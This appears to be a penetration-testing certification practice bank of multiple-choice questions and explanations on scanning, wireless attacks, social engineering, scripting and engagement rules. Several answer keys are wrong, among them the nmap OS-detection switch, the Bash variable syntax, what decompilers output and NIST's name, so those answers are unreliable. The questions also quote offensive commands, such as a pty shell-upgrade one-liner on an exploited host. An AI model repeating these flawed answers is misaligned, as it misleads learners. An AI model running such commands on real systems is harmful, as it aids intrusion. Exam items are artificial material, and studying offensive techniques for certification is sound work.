- A. An effective way to discover vulnerabilities associated with a specific version of an operating system is to consult the Common Vulnerabilities and Exposures (CVE) database. The CVE database can be accessed at http://cve.mitre.org. It contains a list of publicly known cybersecurity vulnerabilities. Whenever a vendor discovers a vulnerability with their product, they add an entry to the CVE database. This database contains vulnerability information for Windows, Mac OS, Linux, UNIX, Android, and iOS operating systems.
Which of the following is a precomputed list of hash values for common passwords that can be used for offline password file cracking?
- Rainbow table
- Fingerprint
- Digital signature
- Private key
- A. A rainbow table contains a precomputed list of hash values for common passwords that can be used for offline password file cracking.
Which relational operator can be used in both Bash and PowerShell to test whether one value is numerically less than the other?
A. <=
B. -lt
C. -le
D. !<
- B. The -lt relational operator can be used in both Bash and PowerShell to test whether one value is numerically less than the other.
During a gray box penetration test, you have used a utility on your Kali Linux laptop to inspect the certificate used by the target organization’s internal web server. The output is shown here:
What can you learn from this output? (Choose two.)
- SSLv2 is supported by the web server.
- TLSv1_1 is supported by the web server.
- TLSv1_2 is supported by the web server.
- TLSv1 is supported by the web server.
- SSLv3 is supported by the web server.
- B and C. The output of the sslyze command in this example shows that the web server responded to TLSv1_1 and TLSv1_2 queries but did not respond to SSLv2, SSLv3, or TLSv1 queries.
A penetration tester connects a special device to a diagnostic port implemented in the motherboard by the manufacturer and is able to capture data from system registers. What type of exploit occurred in this scenario?
- Cold boot attack
- Shell upgrade exploit
- VM escape exploit
- JTAG debug exploit
- D. The JTAG port is implemented in motherboards made by some manufacturers for diagnostic and testing purposes. With the right equipment, a penetration tester can connect to this port and capture data directly from the running motherboard.
During the information gathering phase of a black box penetration test, you need to eavesdrop on radio frequency emissions emanating from the target’s facility and attempt to capture data from their wireless network. You have already captured the authentication handshake. You next need to deauthenticate the wireless client so you can begin capturing data. Which utility should you run on your laptop to do this?
- airodump-ng
- aireplay-ng
- aircrack-ng
- nmap
- B. Before Aircrack-ng can be used to crack the encryption on a wireless network, you must first run the airodump-ng utility on the specific channel used by the transmitting access point to collect the authentication handshake. Then, you need to de-authenticate the wireless client by running the aireplay-ng utility.
You and a colleague are discussing different types of attacks that can take place. One type of an attack is where communications between two parties are intercepted and forwarded and neither party is aware that an interception even took place. What type of attack is being discussed?
- A man-in-the-middle attack
- A spear phishing attack
- A transitive access attack
- A URL hijacking attack
- A. A man-in-the-middle attack happens when communication between two parties is intercepted by an outside entity. Man-in-the-middle attacks are a common kind of cybersecurity attack that allows an attacker to eavesdrop on the communication between two targets. The attack takes place in between two legitimately communicating hosts, allowing the attacker to “listen” to a conversation.
You are a penetration tester, and you are planning an engagement for a new client. Which of the following are the most important things to know prior to starting testing? (Choose two.)
A. Architectural diagrams
B. Company policies
C. Goals/objectives
D. Storage time for a report
E. Tolerance to impact
- B and E. Knowing the company policies and their tolerance to impact are two of the most important items needed to know when planning for an engagement. The others are important as well, but in this scenario the question is which are the two most important. Cybersecurity professionals widely agree that vulnerability management is a critical component of any information security program, and for this reason, many organizations mandate vulnerability scanning in corporate policy, even if that is not a regulatory requirement. The risk and impact tolerance of the organization being assessed should be used to define the scope and rules of engagement for the assessment.
You are a penetration tester, and you are conducting a black box penetration test against your client’s network and are in the process of gathering vulnerability scanning results. What type of scan will provide you with important information within the scope of your testing?
- A compliance scan
- A discovery scan
- A full scan
- A stealth scan
- C. A full scan will provide you with more useful results because it includes more tests. There is no requirement in the scenario that the tester should avoid detection, so a stealth scan is not necessary. But because this is a black box test, it would best to run a full scan on the network.
Consider the following image:
Which nmap commands could have been used to generate this output? (Choose two.)
A. nmap 10.0.0.1
B. nmap 10.0.0.1 -sS
C. nmap 10.0.0.1 -sL
D. nmap 10.0.0.1 -sn
- A and B. In this example, the nmap utility was used to run a TCP SYN scan. Both the nmap 10.0.0.1 and nmap 10.0.0.1 –sS commands can be used to run this kind of scan.
A penetration tester enters the target organization’s physical facility by walking behind an employee and grabbing the authentication-protected door before it shuts all of the way. What is this technique called?
- Piggybacking
- Tailgating
- Lock bypass
- Badge cloning
- A. Piggybacking occurs when an intruder tags along with an authorized person through a physical barrier, such as a locking door or a turnstile. This happens without the authorized person’s knowledge or consent.
You are a penetration tester, and you have full access to a domain controller. You want to discover any user accounts that have not been active for the past 30 days. What command should you use?
A. dsrm -users “DN=client.com; OU=hq CN=users”
B. dsquery user -inactive 4
C. dsquery -o -rdn -limit 30
D. dsuser -name -account -limit 3
- B. Dsquery.exe is a command-line utility for finding information about various objects in the Active Directory domain. The utility is available in all Windows Server versions by default. The dsquery command allows you to query the LDAP directory to find objects that meet the specified criteria. As an attribute of the dsquery command, you need to specify the type of the AD object that you are searching for. In this scenario, you are looking for user accounts that have been inactive for the past 30 days, so you would use dsquery user -inactive < NumWeeks >.
Which control structure will keep processing over and over as long as the specified condition evaluates to false?
A. while loop
B. for loop
C. until loop
D. if/then/else
- C. The until looping structure will keep processing over and over as long as the specified condition evaluates to false.
During a penetration test, an unmonitored side door was left ajar by an employee, which the tester then used to gain physical access to the client’s facility. To keep this from happening again, the client completely removes the door and its frame from the building and fills the space with concrete. Which type of risk response is described in this scenario?
A. Avoidance
B. Transference
C. Mitigation
D. Acceptance
- A. This is an example of risk avoidance. By removing the door and filling in the wall with concrete, the client has completely removed the risk of the door being used by an attacker to gain unauthorized access to the facility.
An employee has just received a very negative performance review from his manager. The employee feels the review was biased and the poor rating unjustified. In retaliation, the employee accesses confidential employee compensation information from an HR database server and posts it anonymously on Glassdoor. What kind of attacker is this?
A. Script kiddie
B. Hacktivist
C. Organized crime
D. Malicious insider
- D. A malicious insider attack occurs when someone within the organization uses the credentials they have been legitimately given to carry out an attack. A script kiddie is an individual who carries out an attack using code written by more advanced hackers. A hacktivist’s attacks are usually politically motivated, instead of financially motivated. An organized crime threat actor is a group of cybercriminals whose main goal is financial gain.
Consider the output from the command shown here:
Which OSINT utility was used to gather this information?
- whois
- nslookup
- nmap
- ifconfig
- host
- A. The whois tool can be used to gather information about domain ownership from public records. In the example shown in this question, you can learn who the registrar is for the domain, the name of the organization that owns it, the address of the organization, the phone number of the organization, the name of the employee that manages the domain, and that employee’s email address.
A penetration tester sends a phishing email to the employees of the target organization. The email purports to be offering iPads for an absurdly low price. However, there are only 25 left at this price. The link in the email leads to a fake website that uses a drive-by-download script that drops a keylogger on the employee’s computer. What motivation factor did the penetration tester use in this scenario?
- Fear
- Social proof
- Authority
- Scarcity
- D. The penetration tester is using scarcity as a motivating factor. By asserting that there are only a small number of devices available at the steeply discounted price, the employees are motivated to make a purchase before supplies run out.
In terms of multifactor authentication, which of the following is an example of something you are?
A. Password
B. Challenge-response questions
C. Retina scan
D. Hardwire connection to the organization’s internal LAN
- C. A retina scan is an example of something you are. Theoretically, no two people should have identical attributes for this type of factor.
Which of the following methods is commonly used to harden network communications on Windows-based computer systems?
A. Enable NetBIOS over TCP/IP.
B. Allow anonymous access to shared folders.
C. Store LAN Manager hash values.
D. Set the LAN Manager authentication level to allow LM and NTLM.
E. Restrict network access to only authenticated users.
- E. To harden network communications on a Windows-based computer system, you should restrict access to the computer over the network access to only authenticated users.
You are a penetration tester, and you are conducting a test for a new client. You are conducting ARP spoofing against a switch on the client’s network. Which of the following MAC addresses should you trick to get the most amount of information?
A. The MAC address of the client
B. The MAC address of the domain controller
C. The MAC address of the web server
D. The MAC address of the gateway
- D. ARP spoofing is a technique in which an attacker sends (spoofed) Address Resolution Protocol (ARP) messages onto a local area network. Normally, the goal is to associate the attacker’s Media Access Control (MAC) address with the IP address of another host, such as the default gateway, causing any traffic meant for that IP address to be sent to the attacker instead. ARP spoofing may allow an attacker to intercept data frames on a network, modify the traffic, or stop all traffic.
Consider the following snippet from a script:
if _x > 2
puts “x is greater than 2”
else
puts “x is less than or equal to 2”
end
What scripting language is this snippet written in?
A. Ruby
B. PowerShell
C. Bash
D. Python
- A. An if/then flow control structure in Ruby uses the following syntax:
- if condition
- commands…
- else
- commands…
- end
You are scanning your client’s internal network as part of a white box penetration test. Your goal is to enumerate the network. What kind of information are you likely to include in the enumeration process?
- Web pages
- Applications
- Services
- Tokens
- All of the above
- E. When enumerating a target network during a white box penetration test, you will likely gather a great deal of information. For example, you will probably want to enumerate any web pages, applications, services, and tokens used on the network.
During a gray box penetration test, the tester wants to be able to set up a bind shell exploit where a listener is set up on a compromised system on the target. Which remote access tools could be used to do this? (choose 2)
A. ncat
B. netcat
C. Powersploit
D. DAST
E. SAST
- A or B. Either the ncat or netcat remote access tool could be used to set up a bind shell exploit.
You are a penetration tester, and you have just completed testing for a new client. You are creating a written report of your findings after the testing. Based on the results of your testing, you have come up with a list of recommendations you think the client should focus on. In what section of the report should you put these recommendations?
A. In the Conclusion section
B. In the Executive Summary section
C. In the Findings and Remediation section
D. In the Methodology section
- A. The conclusion is your opportunity to summarize your report and to make recommendations. The conclusion is the final overview of the test. It should end on a positive note giving the client support and guidance.
Consider the following image:
Which nmap command could have been used to generate this output?
A. nmap 10.0.0.5
B. nmap 10.0.0.5 -sS
C. nmap 10.0.0.5 –sV
D. nmap 10.0.0.5 –sT
- C. In this example, the nmap utility was used to scan the open ports on the host listed in the command and then determine the version of the service using each of those ports. This is done by running nmap with the –sV option.
Which type of penetration test requires the most time and money to conduct?
A. White box
B. Gray box
C. Black box
D. Green box
- C. Because the penetration tester has no knowledge of the target, a black box test takes the most time and money to conduct. In contrast, gray box and white box tests are usually must less expensive and take less time to conduct because the tester has some level of prior knowledge about the target.
Which of the following tools are used to collect and analyze evidence from a digital crime scene? (Choose two.)
A. APKX
B. Peach
C. foremost
D. AFL
E. FTK
- C and E. Both foremost and FTK are forensic tools. They are used to gather and analyze digital evidence from a cyber crime scene.
A Windows server is functioning as an Active Directory domain controller for an organization’s network. Which of the following services are not required for it to fulfill this role? (Choose two.)
A. Group Policy Management
B. Hyper-V
C. Role Administration Tools
D. Active Directory Federation Services
- B and D. Every network service enabled on a server expands that server’s attack surface. Therefore, only those services that are actually needed should be installed. In this scenario, the domain controller shouldn’t be running Hyper-V, which is used for virtualization. Likewise, Federation Services is used only in situations where one Active Directory domain is linked to (“federated”) with a different Active Directory domain.
Which of the following tools can be used as a part of software assurance processes to perform SAST and DAST testing? (Choose two.)
A. Findsecbugs
B. YASCA
C. Metasploit
D. theHarvester
E. Recon-ng
- A and B. Both Findsecbugs and Yet Another Source Code Analyzer (YASCA) can be used to perform static application security testing (SAST) or dynamic application security testing (DAST) as part of software assurance.
You are a penetration tester, and you are currently in the middle of a test when the client asks you to add more addresses. Which of the following defines the target list that you can follow?
A. The end-user license agreement
B. The master services agreement (MSA)
C. The rules of engagement (ROE)
D. The statement of work (SOW)
- D. A statement of work (SOW) defines what work will be done during an engagement. A SOW is a document that defines the purpose of the test, what tests will be done, what will be created, the timeline for the test to be completed, the price for the testing, and any additional terms and conditions.
During a web application penetration test, a penetration tester observes that the content security policy header is missing. What type of attack would the tester most likely perform next?
- A clickjacking attack
- A command injection attack
- A directory traversal attack
- A remote file inclusion attack
- A. Clickjacking is when a tester uses multiple transparent layers to trick a user into clicking a button or link on another page when they were intending to click the top-level page. The tester is “hijacking” clicks and routing them to another page. In web browsers, clickjacking is a browser security issue that is a vulnerability across a variety of browsers and platforms. A clickjack takes the form of embedded code or a script that can execute without the user’s knowledge, such as clicking a button that appears to perform another function.
Which Bash script command will create a new variable named TOTAL and set its type to be integer?
A. variable –i TOTAL
B. declare –i TOTAL
C. declare TOTAL –t integer
D. TOTAL=integer
- B. The declare –i TOTAL command will create the TOTAL variable and type it as integer.
You are a penetration tester, and you are putting together the terms of a penetration test that you will be conducting for a new client. Which of the following is an appropriate method to secure legal permission to conduct the test?
A. Send an email asking a member of senior management for permission to start the test.
B. Make a phone call and ask a member of the IT staff for permission to start the test.
C. Ask a member of the IT staff to sign a document granting you permission to start the test.
D. Ask a member of senior management to sign a document granting you permission to start the test.
- D. Before conducting a penetration test, you must get written permission from the senior management of the client’s organization to start the test. It is not acceptable to get permission verbally or by email. It is also not acceptable to obtain permission from the IT staff.
Which open source research source is a community-developed common database that contains descriptions of commonly used cyberattack patterns?
- CERT
- CWE
- CVE
- CAPEC
- D. The Common Attack Pattern, Enumeration and Classification (CAPEC) database is a community-developed resource that can be accessed at http://capec.mitre.org. The CAPEC database contains a catalog of commonly used cyber attack patterns.
You are arranging the terms of a penetration test with a new client. Which of the following is an appropriate way to secure legal permission to conduct the test?
A. Ask a member of senior management via email for permission to perform the test.
B. Ask a member of the IT staff over the phone for permission to perform the test.
C. Ask a member of the IT staff to sign a document granting you permission to perform the test.
D. Ask a member of senior management to sign a document granting you permission to perform the test.
- D. Before conducting a penetration test, you must get written permission from the senior management of the target organization to perform the test. Getting permission verbally or via email is generally not acceptable. Getting permission from the IT staff is also generally not acceptable.
Brittany is running a gray box penetration test. She discovers a flaw in an HR web application. Using a SQL injection attack, she can add or remove hours to or from an employee’s timecard for the current pay period. Which penetration testing goal has she accomplished?
A. Disclosure
B. Availability
C. Alteration
D. Confidentiality
- C. Attackers (and penetration testers) seek to undermine the goals of the CIA triad model using the corresponding goals of the DAD triad. The A in DAD stands for alteration, which refers to making unauthorized changes to information or systems. In this scenario, Brittany has altered the employee pay accounting system.
You are conducting a gray box penetration test for a client. You use the nmap utility to see whether the Telnet service is running on a Linux server you discovered. The output of the command indicates that the Telnet port state is Closed. What could this mean? (Choose two.)
A. The Telnet service is installed but not running.
B. The Telnet service is installed, running, and accessible.
C. The Telnet service is not installed, and a different service is using its default port.
D. The Telnet service is not installed.
E. The Telnet service is installed and running, but a host firewall is blocking it.
- A. When nmap indicates a port is closed, it usually means either the associated service is not installed at all or it has been installed but currently isn’t running. Therefore, nothing is listening on its associated port.
You are a penetration tester, and you are preparing to conduct an application programming interface (API) test for a client. Which of the following would be the most favorable to use when preparing for this kind of testing?
A. Nikto
B. Swagger
C. Web Application Archive (WAR)
D. Web Application Attack and Audit Framework (W3AF)
- B. Swagger is an open specification for defining REST APIs. A Swagger document is the REST API equivalent of a WSDL document for a SOAP-based web service. The Swagger document specifies the list of resources that are available in the REST API and the operations that can be called on those resources. It also specifies the list of parameters to an operation, including the name and type of the parameters, whether the parameters are required or optional, and information about acceptable values for those parameters. So, access to a Swagger document provides testers with a good view of how the API works and thus how they can test it.
You are a penetration tester, and you are putting together the rules of engagement (ROE) for an upcoming test for a new client. What items do you need to include in the ROE? (Choose two.)
A. The timeline that testing will be conducted
B. A review of any laws, especially any that govern the client
C. A list of similar companies that you have tested previously
D. A list of your client’s competitors
E. A detailed map of the client’s network
- A and B. The rules of engagement (ROE) should always include the timeline that testing will be conducted as well as a review of any laws, especially any that govern the client to ensure that you don’t break any. A list of other organizations that you have previously tested or a list of the client’s competition is not required to be included in the ROE document. A detailed map of the client’s network would not be needed for the ROE but may be needed for the penetration testing.
You are a penetration tester, and you are working on an upcoming test for a new client. The client has requested a white box assessment. The goal of the test is to see whether you can gain access to confidential customer data that is stored on an internal database server. You have asked the client for architectural diagrams. What information should the client provide you with? (Choose two.)
A. The facility maps
B. The network diagrams
C. The Simple Object Access Protocol (SOAP) documentation
D. The Swagger document
- A and B. In this scenario, you are conducting a white box assessment. So, when requesting internal architectural diagrams as a part of testing, you should usually be supplied with documentation such as network diagrams and facility maps. You can use this information to help map out the network topology and to locate key infrastructure devices, such as switches, routers, and servers.
You are a penetration tester, and you are conducting a test for a new client. You plan on using nmap to conduct OS fingerprinting using a company provided text file that contains a list of all the IP addresses. What switches would you need to include in your code to conduct OS fingerprinting using the text file? (Choose two.)
A. -iL
B. -O
C. -oN
D. -oX
E. -sS
F. -sV
- A and F. One of nmap’s best-known features is remote OS detection using TCP/IP stack fingerprinting. Nmap sends a series of TCP and UDP packets to the remote host and examines the responses. -iL : This is the input from list of hosts/networks. -sV: This probes open ports to determine service/version information.
You are a penetration tester, and you have just completed testing for a new client. You have revealed that a legacy web application is vulnerable to SQL injections. The client indicates that remediating the vulnerability would require an architectural change and management does not want to risk anything happening to the current application. Which of the following conditions would minimize the SQL injection risk while proving a low-effort and short-term solution? (Choose two.)
A. From the stored procedures, identify and remove the dynamic SQL.
B. From the code, identify and remove the inline SQL statements.
C. Identify and sanitize all user inputs.
D. Identify the source of malicious input and block the IP address.
E. For the SQL statements, use a blacklist validation.
F. For the SQL statements, use a whitelist validation.
- E and F. Given this scenario, the client will want to use a blacklist and whitelist validation for the SQL statements. SQL injection is a common attack route that uses malicious SQL code for backend database manipulation to access information that was not intended to be displayed. SQL injections are one of the most common web hacking techniques. Blacklist validation tests the external input against a set of known malicious inputs. Whitelist validation tests an external input against a set of known, approved input. With whitelist input validation, the application knows exactly what is wanted and rejects other input.
A user has noticed that their machine has been acting unpredictably over the past week. They have been experiencing slowness and input lag. The user has found a few text files that appear to contain bits of their emails and some instant messenger conversations. The user runs a virus scan where nothing is detected. What type of malware maybe affecting this machine?
- Backdoor
- Keylogger
- Ransomware
- Rootkit
- B. A keylogger is software and hardware that can be useful as part of an ongoing exploitation process. Capturing keystrokes provides insight into the actions taken by users, and it can be a valuable source of credentials and other confidential information. A keylogger is software that tracks or logs the keys struck on a keyboard. This is usually done with malicious intent to collect account information, credit card numbers, usernames, passwords, and other private data.
You are performing reconnaissance as part of a gray box penetration test. You run a vulnerability scan on one of the target organization’s servers and discover that port 22 is open. What does this indicate?
- It is an LDAP server.
- It is a POP3 email server.
- It is an SSH server.
- It is an HTTP server.
- C. The default port used by the SSH service is 22. The SSH protocol is used to remotely manage systems using a command line interface. Unlike Telnet, SSH uses encryption to protect authentication credentials as well as the data being transmitted between the client and the server.
Which of the following is a document defined during the planning and scoping phase of a penetration test that identifies specific techniques, tools, activities, deliverables, and schedules for the test?
A. MSA
B. NDA
C. Memorandum of understanding
D. SOW
- D. A statement of work (SOW) is an agreement that should be defined during the planning and scoping phase of a penetration test. It contains a working agreement between the penetration tester and the client that identifies specific techniques, tools, activities, deliverables, and schedules for the test. It may be used in conjunction with an existing master services agreement (MSA).
You are a penetration tester, and you are conducting a test for a new client. You are planning to create a custom wordlist of common words and catchphrases about your client using the client’s website. What is the name of the tool that you can utilize to assist with building a custom wordlist?
A. CeWL
B. Hashcat
C. Hydra
D. Medusa
- A. The Custom Word List (CeWL) generator is a Ruby application that allows a tester to scour a website based on a URL and depth setting and then generate a wordlist from the files and web pages it finds. Running CeWL against a target organization’s websites can help generate a custom wordlist. Building a custom wordlist can be particularly useful if you have gathered a lot of information about your target organization.
Which of the following threat actors is probably the least dangerous based on the adversary tier list?
A. Hacktivist
B. Malicious insider
C. Script kiddie
D. Nation-state actor
- C. A script kiddie usually lacks the technical sophistication to mount an attack using their own tools. Instead, they typically download existing tools and run them. Because these tools are already known to the cybersecurity community, script kiddies generally pose less of a threat than the other types of actors in the adversary tier list.
During the discovery phase of a black box penetration test, you have identified an email address that you suspect belongs to an executive within the target organization. You use the centralops.net website to analyze that email address. The results are shown here:
What can you learn from the output?
- The organization’s email server has an IP address of 208.101.20.81.
- The organization’s email naming convention is first_initial+lastname@company_name.com.
- The organization’s email naming convention is first_initial.lastname@company_name.com.
- The organization’s email server does not respond to HELO commands.
- B. In this example, the line that reads “250 2.1.5 Recipient OK” indicates that this is a valid email address within the target organization’s domain. Because this is a valid email address, you now know that the organization most likely uses an email naming convention of first_initial+lastname@company_name.com. Using this information, you could reference the organization’s executive bio web page and construct email addresses for all of its management team members.
You are performing a gray box penetration test for a client. You want to target an in-house application that the organization’s employees use daily. To identify weaknesses in the code, you decide to decompile the application’s executable. You have some experience programming in C++, so you feel comfortable reviewing the source code revealed by the decompile process. However, after decompiling, you find that you don’t understand the contents of the source code file produced. Why did this happen?
- You need to convert the output to C++.
- Decompilers usually produce assembly-level code.
- You forgot to use the –C option when you ran the decompiler.
- The application is so poorly written that the decompiler can’t reproduce the source code.
- B. Most decompilers produce assembly-level source code, not C++ code. For this information to be useful, you need extensive experience working with assembly language code. Typically, this will require you to hire a consultant with an extensive understanding of assembly programming.
You have just concluded a penetration test for a client that uses a large number of temporary workers and contractors. In your findings, you report that temporary and contract user accounts are frequently not deactivated or removed when their work is complete because they frequently come back to work on new projects several months later. Given that the client uses Linux desktops and servers, which of the following Linux commands should you recommend they use to manually lock temporary or contract user accounts until the worker returns for a new project?
A. lockusr
B. chmod
C. chage
D. passwd
- D. To harden a server system, you should make sure all stale user accounts are disabled or deleted. In this scenario, the client doesn’t want to delete the accounts because the temporary or contract users may be coming back in the future. To lock an account manually, you can use the passwd –l command followed by the name of the user.
A penetration tester runs the following from an exploited machine: python -c ‘import pty; pty.spawn(“/bin/bash”)’ What action is the tester performing?
- Creating a sandbox
- Capturing the credentials
- Removing the Bash history
- Upgrading the shell
- D. The pty module lets a penetration tester spawn a pseudoterminal that can fool commands like su into thinking they are being executed in a proper terminal. To upgrade the shell, just run the command shown. su is a Unix command that stands for substitute user. It is used by a computer user to execute commands with the privileges of another user account. When executed, it invokes a shell without changing the current working directory or the user environment.
You have created a list of target hosts that you want to scan with nmap and saved it to a text file named /root/targets.txt. Which command should you use to run the scan using this file?
A. nmap -iR /root/targets.txt
B. nmap –file /root/targets.txt
C. nmap -iL /root/targets.txt
D. nmap -iF /root/targets.txt
- C. The -iL file_name option tells nmap to read the specified file and scan only those hosts listed in the file.
You are a penetration tester, and you are performing an on-site penetration test. What scoping element do you need to know for a wireless assessment when working on-site in a shared building?
A. The encryption type
B. The frequency of the wireless network
C. Any preshared keys
D. The service set identifiers (SSIDs)
- D. It is vital to know which service set identifiers (SSIDs) belong to your target and which are invalid targets. Also, knowing which subnets or IP ranges are in scope is also important to avoid targeting the wrong network or going outside of the penetration test’s scope. Knowing the SSIDs that are in scope is critical when working in shared buildings. Penetrating the wrong network could cause legal or even criminal consequences.
You are assessing the results of a vulnerability scan and notice that many network devices, such as routers and access points, still use default administrative usernames and passwords. This information can be easily found on the Internet and represents a significant security vulnerability. What should you do? (Choose two.)
- Recommend that the client adopt a best practice of changing all default usernames and passwords.
- Exploit the devices that are using default usernames and passwords.
- Manually change the default usernames and passwords for the client.
- Publish the fact that the client is still using default usernames and passwords on a popular online cybersecurity forum.
- A and B. Your first response to the client’s lack of best practices would to be to exploit the devices with default usernames and passwords later in your penetration test. Then, you should recommend that the client adopt better best practices in your final report.
You are a penetration tester and are discussing the properties of the testing engagement agreement with the client. Which one of the following will have the biggest impact on the observation and testing of the client’s production systems during their peak loads?
A. Creating a scope of the critical production systems used by the client
B. Establishing a white box testing engagement with the client
C. Having the client’s management team sign off on any invasive testing
D. Setting up a schedule of testing times to access their systems
- D. The timeline for the engagement and when testing can be conducted will have the biggest impact on the observation and testing of the client’s systems during peak hours. Some assessments will be scheduled for noncritical time frames to minimize the impact of any potential outages, while others may be scheduled during normal business hours to help test the organization’s reaction to attacks.
You are using a Telnet client to connect to a web server in an attempt to fingerprint what type and version of web server software is running on it. What is this process called?
- Banner grabbing
- Scanning
- Exploiting
- Cracking
- A. Banner grabbing is the process of manually connecting to a device, such as a web server, using a utility such as a Telnet client or Ncat and using the information displayed to fingerprint the device.
While reading an executable script file, you see a line near the beginning of the script that references the value of a variable using the following syntax:
echo {$ServerName}
Which type of script could this be?
A. PowerShell
B. Bash
C. Ruby
D. Python
- B. When referencing the value of a variable, Bash uses the following syntax: {$variable_name}. In this example, the echo command is being told to display the value of the variable named ServerName on the screen.
Which type of vulnerability scan is least likely to be detected by an intrusion prevention system (IPS) or intrusion detection system (IDS)?
- Discovery
- Full
- Stealth
- Compliance
- A. A discovery scan is designed to simply map out every system on the target network using very nonintrusive mechanisms (such as ping) to enumerate the network. Because of this, this type of scan is the least likely to be detected by an IDS or IPS device.
During the information gathering phase of a gray box penetration test, you run the NBTSTAT -c command on the local network. One of the lines in the output reads as follows:
Name Type Host Address Life [sec]
DEV-1 <20> UNIQUE 10.0.0.3 517
What do you know about the DEV-1 host?
- It is a server.
- It is a workstation.
- It is a router.
- It is a wireless device.
- A. NBTSTAT identifies NetBIOS servers with an ID of <20>. Based on this output, you know that DEV-1 is most likely a Windows server (or a Linux server running the Samba service).
Which of the following are ways in which services on a Windows system can be exploited? (Choose two.)
- Using unquoted service paths
- Replacing executables for writable services
- Implementing a cold boot attack
- Compromising credentials in LSASS
- A and B. Using unquoted paths to services is one way that services can be exploited on a Windows system. By not quoting paths to services, any spaces in a directory name won’t be processed correctly and can cause a malicious service executable located deliberately in the resulting unquoted directory path to be loaded instead of the correct service executable. In addition, writeable service executable files can be replaced with malicious executables with the same file name.
A penetration tester sends a spear phishing email to an employee of the target organization, claiming to be a fellow employee who has forgotten her password. The email indicates she has a presentation in a few minutes and can’t access her presentation files on a shared network drive. She asks the employee to “loan” her his username and password so she can log on and get the files. What motivation factor did the penetration tester use in this scenario?
- Fear
- Urgency
- Authority
- Scarcity
- B. By masquerading as a fellow employee in great distress in this scenario, the penetration tester is using urgency to motivate the employee to give up his username and password. She may also be using likeability as a factor.
Which of the following is an example of a nontraditional asset?
- Email server
- Computer-controlled manufacturing equipment
- Wireless access point
- All-in-one desktop
- B. Computer-controlled manufacturing devices are examples of nontraditional systems. These devices are considered fragile because they are difficult to manage in the traditional sense and they are probably updated on an infrequent basis by the vendor. They may also have not been subjected to extensive security testing by the vendor.
Which exploit relies on a telephone call to convince someone to reveal sensitive information?
- Vishing
- Spear phishing
- Phishing
- Whaling
- A. A voice phishing attack (also called a vishing attack) leverages a telephone call instead of email to conduct a phishing exploit. Essentially, the attacker calls a particular employee pretending to be someone else in order to get information.
You are writing the following Python code:
if 1 == 1:
print(“howdy”)
elif 3 == 3:
print(“howdy”)
else:
print(“howdy”)
How many times will this code print the word howdy?
A. 0
B. 1
C. 2
D. 3
- B. In this scenario we are using a conditional execution, so only one clause is executed. So, in this case, the code following the if clause will execute, making it impossible for the elif or else clause to execute. Conditional execution allows developers to write code that executes only when certain logical conditions are met. The most common conditional execution structure is the if..then..else statements.
Which types of network devices are commonly whitelisted in many NAC implementations? (Choose two.)
- Laptops
- Desktops
- Servers
- VOIP phones
- SCADA devices
- D and E. VoIP phones and SCADA devices typically cannot be configured in a manner that allows them to meet the security policy requirements of a NAC system. For example, you usually can’t install antimalware software on a VoIP phone or a SCADA device. Therefore, these systems are commonly whitelisted in NAC implementations, allowing them to bypass the requirements applied to other systems.
During a gray box penetration test, the tester uses Wireshark to sniff the network traffic between an employee’s web browser and a website and is able to capture the session cookie. The tester is then able to impersonate the victim without capturing the user’s actual authentication credentials. What type of authentication exploit was used in this scenario?
- Kerberos exploit
- Session hijacking
- Redirect attack
- Password cracking
- B. This is an example of session hijacking. The tester was able to exploit the session key (the cookie) to gain access to the user’s session. This type of exploit can be used for web applications where an HTTP cookie is used to maintain a session. Even though the site may have used TLS/SSL to encrypt authentication credentials, the session cookie is many times not encrypted. If it is captured, it allows the tester to hijack the user’s session.
You and a colleague are discussing an open source research source that is maintained by the U.S. government’s National Institute of Science and Technology (NIST). This source provides a summary of current security. What is this government repository called?
A. The Common Attack Pattern Enumeration and Classification (CAPEC)
B. Computer Emergency Response Team (CERT)
C. Common Vulnerabilities and Exposures (CVE)
D. National Vulnerability Database (NVD)
- D. The National Vulnerability Database (NVD) is the U.S. government repository of standards based on vulnerability management data represented using the Security Content Automation Protocol (SCAP). This data enables automation of vulnerability management, security measurement, and compliance. The NVD includes databases of security checklist references, security-related software flaws, misconfigurations, product names, and impact metrics.
You are a penetration tester, and you are conducting a test for a new client. As a part of your penetration test, you need to establish an active connection to the computer systems and devices at your client’s location to enumerate and fingerprint them. Which of the following tools could you use to do this? (Choose two.)
A. Aircrack-ng
B. hping
C. nmap
D. whois
- B and C. The nmap and hping utilities can be used to actively enumerate and fingerprint target systems. Hping is a command-line tool that allows testers to artificially generate network traffic. Hping is popular because it allows you to create custom packets. Nmap is the most commonly used command-line vulnerability scanner and is a free, open-source tool. It provides a broad range of capabilities, including multiple scan modes intended to bypass firewalls and other network protection devices. Whois is a tool that gathers information from public records about domain ownership. Aircrack-ng provides the ability to conduct replay and deauthentication attacks and to act as a fake access point.
You are a penetration tester, and you want to do a search to see your client’s computers and devices that are connected to the Internet and that will show you the geoIP information, if available. Which tool can you use to accomplish this?
A. Censys
B. Shodan
C. theHarvester
D. Whois
- A. Much like Shodan, Censys is a security-oriented search engine. When you dig into a host in Censys, you will also discover geoIP information, if it is available, and a comprehensive summary of the services the host exposes providing more detailed information. GeoIP refers to the method of locating a computer terminal’s geographic location by identifying that terminal’s IP address.
You are a penetration tester, and you want to do a search to see your client’s computers and devices that are connected to the Internet by using a variety of filters. Which tool can you use to accomplish this?
A. Censys
B. Shodan
C. theHarvester
D. Whois
- B. Shodan is a popular security search engine and provides prebuilt searches as well as categories of search for industrial control systems, databases, and other common search queries. Shodan is a search engine that lets the user find specific types of computers and devices that are connected to the Internet using a variety of filters. Some have described it as a search engine of service banners, which are metadata that the server sends back to the client. Using Shodan for penetration testing requires some basic knowledge of banners including HTTP status codes.
Which Windows Group Policy setting determines how long a user’s account will stay locked if the wrong password has been entered too many times?
A. Maximum password age
B. Account lockout duration
C. Account lockout threshold
D. Minimum password age
- B. The “Account lockout duration” Group Policy setting determines how long a locked account remains locked before being automatically unlocked. This policy setting helps prevent brute-force attacks by severely increasing the amount of time required to conduct the attack.
You are performing a black box penetration test for a medium-sized manufacturing organization. Using reconnaissance techniques, you have identified the vendor that services the printers within the organization’s headquarters. You dress in a similar uniform as that vendor’s employees. You also purchase a toolkit containing tools commonly used by printer repair technicians. The receptionist of the target organization allows you to enter and directs you to a troublesome printer. While “working” on that printer, you chat with nearby employees to gather information. Which exploits did you use in this scenario? (Choose two.)
- Impersonation
- Whaling
- Phishing
- Interrogation
- Elicitation
- A and E. Impersonation is a social engineering technique that can be used by a penetration tester to gain physical access to the target’s facility. In this scenario, the receptionist allowed the tester to access the organization’s facility because the tester appears to be from a trusted vendor. The tester also used elicitation techniques to gather sensitive information from employees.
